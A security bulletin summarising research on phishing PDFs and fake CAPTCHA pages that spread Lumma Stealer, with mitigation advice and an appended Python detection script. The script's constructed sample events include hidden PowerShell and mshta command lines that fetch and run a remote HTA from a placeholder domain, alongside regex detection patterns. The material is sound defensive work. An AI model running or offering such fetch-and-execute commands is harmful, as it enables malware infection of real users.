5,000 Phishing PDFs on 260 Domains Distribute Lumma Stealer via Fake CAPTCHAs

Summary:
Netskope Threat Labs researchers expanded upon their report on threat actors leveraging fake CAPTCHAs for phishing on February 12th, 2025, with new research published in a blog post yesterday. After their initial investigation, they uncovered 260 unique domains hosting nearly 5,000 phishing PDF files that redirect victims to malicious websites, either to steal credit card information or to deliver Lumma Stealer via fake CAPTCHAs and PowerShell commands. To spread Lumma Stealer, the attackers created PDFs with embedded 'Download' button images. Clicking the deceptive image takes the user to a website featuring a fraudulent CAPTCHA. If the user then follows its instructions to paste the clipboard contents into the Windows Run prompt and execute them, an older version of PowerShell launches a concatenated MSHTA command. This command retrieves a second-stage PowerShell script, which in turn downloads and deploys the Lumma Stealer malware.

Since the latter half of 2024, the phishing campaigns tracked by Netskope have compromised over 1,150 organizations and more than 7,000 individual users. The technology, financial services, and manufacturing sectors were heavily targeted, and victims were concentrated in North America, Asia, and Southern Europe. Webflow was the most popular platform for hosting the malicious PDF files, but GoDaddy, Strikingly, Wix, and Fastly also played significant roles in distributing this type of content. The attackers also placed phishing PDFs on document-sharing platforms such as pdfcoffee, pdf4pro, pdfbean, and the Internet Archive, expanding their victim pool to people who search for documents on those sites in addition to traditional search engine users lured via SEO poisoning.

Security Officer Comments:
The tactics outlined in this campaign demonstrate a sophisticated understanding of user behavior and search engine algorithms. The use of fake CAPTCHAs is particularly concerning, as it exploits a familiar security measure to gain user trust, and the technique is becoming much more prevalent among cybercriminals. The campaign's focus on user manuals is a clever strategy, as it targets individuals actively seeking information, who are therefore more likely to interact with the malicious content. The attackers' reliance on SEO poisoning underscores the importance of search engine security and the need for users to exercise caution when clicking on search results. Additionally, the use of PDFs as a delivery mechanism highlights the ongoing vulnerability of this file format, despite improvements in security software. This campaign demonstrates that attackers are constantly evolving their techniques and that proactive threat intelligence is paramount in cybersecurity. Organizations must implement comprehensive security measures, including robust endpoint protection, user training for identifying phishing threats, and threat hunting, to mitigate the risks posed by such attacks.

Suggested Corrections:
IOCs are available here.
  • User Education and Awareness: Train users to recognize phishing tactics, especially those involving fake CAPTCHA pages and suspicious prompts. Emphasize the dangers of clicking on unfamiliar links and executing system actions from untrusted sources.
  • Cautious Web Browsing: Encourage users to avoid clicking on unfamiliar links and to verify any unexpected or suspicious requests for system actions.
  • Web Filtering: Implement web filtering solutions to block known malicious URLs or those leading to phishing websites.
  • Browser Security: Ensure all browsers have anti-phishing features enabled and are updated to the latest versions.
  • PowerShell Logging and Auditing: Monitor and audit PowerShell usage (for example, by enabling script block and module logging) rather than blocking the application outright, since it is essential for system administration.
  • Endpoint Protection: Deploy advanced endpoint protection solutions that can detect anomalous user behavior and block malware execution.
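As an added example (not part of the original report or of Netskope's material), the following Python script turns the infection chain described in the Summary into detection logic over process-creation telemetry: it flags PowerShell launched from explorer.exe (the Run prompt) with an mshta argument, mshta.exe fetching remote content, and PowerShell spawned by mshta.exe. The event records and the captcha-verify.invalid domain are constructed for illustration.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 / Windows 4688
# process-creation records (ParentImage, Image, CommandLine). Not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",                       # Run prompt
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "mshta http://captcha-verify.invalid/v.hta"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://captcha-verify.invalid/v.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",                 # second stage
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -w hidden -File C:\Users\Public\stage2.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",                       # benign admin use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
    {"ParentImage": r"C:\Windows\System32\services.exe",              # benign
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

PS_RE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)   # image is a PowerShell host
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.I)        # mshta referenced in args
URL_RE = re.compile(r"https?://", re.I)                    # remote content fetched


def classify(ev):
    """Return the list of chain stages this single event matches (empty if none)."""
    parent, image, cmd = ev["ParentImage"].lower(), ev["Image"].lower(), ev["CommandLine"]
    findings = []
    # Stage 1: user pastes clipboard into Run prompt -> explorer.exe spawns PowerShell
    # whose command line hands off to mshta.
    if PS_RE.search(image) and parent.endswith("\\explorer.exe") and MSHTA_RE.search(cmd):
        findings.append("powershell from explorer.exe invoking mshta (fake-CAPTCHA run-prompt pattern)")
    # Stage 2: mshta.exe pulling an HTA from a remote URL.
    if image.endswith("\\mshta.exe") and URL_RE.search(cmd):
        findings.append("mshta.exe executing remote content")
    # Stage 3: mshta.exe launching the second-stage PowerShell script.
    if PS_RE.search(image) and parent.endswith("\\mshta.exe"):
        findings.append("powershell spawned by mshta.exe (second-stage script)")
    return findings


def hunt(events):
    """Run classify() over a batch; yields (event index, finding) pairs for review."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Corroborating the three stages in sequence on one host, rather than alerting on any single rule, keeps legitimate administrative PowerShell use (event 3 above) out of the alert queue.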
Link(s):
https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html